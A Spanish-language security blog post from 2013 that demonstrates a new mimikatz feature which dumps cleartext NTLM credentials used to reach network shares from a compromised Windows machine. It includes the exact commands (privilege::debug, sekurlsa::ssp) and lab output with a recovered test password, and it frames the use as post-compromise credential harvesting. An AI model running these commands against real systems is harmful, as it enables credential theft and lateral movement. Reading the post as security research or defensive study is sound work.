16 de enero de 2013

Recuperando contraseñas de red Windows con mimikatz

Los que me conocen, saben que mimikatz es una de mis herramientas favoritas a la hora de sacar contraseñas y otra información útil de un sistema Windows. Y esto es debido a que Gentil Kiwi (el autor) no para de mejorarla, investigando nuevas "funcionalidades" que Microsoft no reconoce como vulnerabilidades pero que son un riesgo para la seguridad de los usuarios.

Hasta hace poco, mimikatz tan sólo mostraba en texto claro las contraseñas de los usuarios que hubieran iniciado una sesión interactiva en el equipo (iniciando sesión localmente, a través de escritorio remoto...). Hace una semana, se publicó una nueva versión que permitía recuperar las contraseñas que se han utilizado para crear alguna tarea programada y cualquier contraseña de tipo CRED_TYPE_DOMAIN_PASSWORD, esto incluye contraseñas que se hayan utilizado para crear tareas programadas, sesiones guardadas de RDP..., y hoy he podido probar una última versión, que permite obtener las contraseñas que se utilizan al conectarse a un sistema remoto sin llegar a iniciar sesión, por ejemplo, si nos conectamos a una unidad de red remota.

Ésta es una funcionalidad muy esperada porque puede servir para recuperar más credenciales de un sistema una vez comprometido. El problema que le he visto, es que se recuperan las credenciales de los sistemas a los que nos conectamos desde el equipo comprometido, pero no la de las cuentas que se conectan a dicho equipo. Es decir, que si se comprometiera un servidor de ficheros, no podríamos recuperar las contraseñas de todos los usuarios conectados al mismo. Pero por el contrario, si se compromete una estación de trabajo de un administrador que tiene diferentes contraseñas con las que conectarse a diferentes recursos de red, podremos recuperar todas esas contraseñas.

De momento habrá que aprovechar la nueva funcionalidad mientras esperamos algo que nos permita recuperar las credenciales de las cuentas conectadas a un equipo.

La prueba que he hecho ha sido conectarme desde un sistema Windows (TEST) a un segundo (PRUEBAS01) y ejecutar después mimikatz en TEST. Éste ha sido el resultado:

C:\>mimikatz.exe
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Jan 15 2013 06:20:17) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::ssp

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : SERVICIO LOCAL
Domaine d'authentification  : NT AUTHORITY
        ssp :

Authentification Id         : 0;38685
Package d'authentification  : NTLM
Utilisateur principal       : TEST
Domaine d'authentification  : TEST-863C3D4E8A
        ssp :
         [0] { admin ; PRUEBAS01 ; EstaEsMiPassword123 }

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : Servicio de red
Domaine d'authentification  : NT AUTHORITY
        ssp :

Authentification Id         : 0;31314
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        ssp :

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : TEST-863C3D4E8A$
Domaine d'authentification  : GRUPO_TRABAJO
        ssp :

mimikatz #

Como se puede ver, mimikatz lista los recursos externos en los que hay una sesión iniciada y las credenciales que se han utilizado para conectarse.

¡Ojo! Ahora mismo, esta nueva funcionalidad tan sólo obtiene las credenciales utilizadas para conectarse a otros sistemas en los procesos de autenticación que se haya utilizado NTLM como protocolo. Es decir, que si en una red local, las conexiones remotas se negocian a través de Kerberos, mimikatz no podrá sacar las credenciales en claro.

Interesante, ¿no?

3 comentarios:

Gabriel Pozo dijo...

Muy buena funcionalidad

Anónimo dijo...

Buena herramienta y muy bien explicado. Gracias.

Sara Morán dijo...

Hola!! En primer lugar enhorabuena por este articulo, muy interesante la vddad. Y en segundo lugar queria recomendaros la página de facebook de Zitralia. Yo la utilizo a diario para estar al día sobre seguridad informatica. Tambien tiene blog.- Espero que os sirva. Un saludo!

https://www.facebook.com/zitralia

Publicar un comentario